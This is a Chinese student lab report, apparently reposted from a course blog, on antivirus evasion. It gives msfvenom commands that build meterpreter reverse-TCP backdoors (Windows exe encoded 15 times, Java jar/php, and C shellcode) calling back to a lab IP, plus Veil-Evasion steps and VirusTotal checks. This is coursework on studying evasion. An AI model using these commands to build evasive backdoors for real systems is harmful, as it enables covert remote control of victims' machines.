首页 > 其他 > 详细

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

时间:2019-03-31 13:53:07      阅读:140      评论:0      收藏:0      [点我收藏+]

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

**免杀**
- 一般是对恶意软件做处理,让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。
- 要做好免杀,就时清楚杀毒软件(恶意软件检测工具)是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。
- 反过来也一样,了解了免杀的工具和技术,你也就具有了反制它的基础。

实验内容

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧

1、使用msf编码器生成后门程序
技术分享图片

2、使用virus total 进行测试
技术分享图片

3、使用msf编码器编码15次后门程序,看看有何效果

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.142.129 LPORT=5227 -f exe > met-encoded15.exe

技术分享图片

4、使用msfvenom生成jar和php

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor_java.jar

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.142.129 lport=5227 x> 20165227_backdoor.php

技术分享图片

5、使用veil-evasion进行后门生成(安装耗时太久,各种问题)安装可参照Veil-Evasion安装

  • 在``Veil-Evasion文件夹下输入命令./Veil-Evasion.py``` 启动
    技术分享图片

  • 使用命令:use 然后 7 设置IP和端口
    技术分享图片

  • 使用generate 生成后门
    技术分享图片

  • 使用virus total 进行测试
    技术分享图片

6、利用shellcode编程

  • 生成shellcode msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.142.129 LPORT=5227 -f c
    技术分享图片

任务二:Linux平台交叉编译Windows应用

2018-2019-2 网络对抗技术 201652287 Exp3 免杀原理与实践

原文:https://www.cnblogs.com/zhuyue-study/p/10630782.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!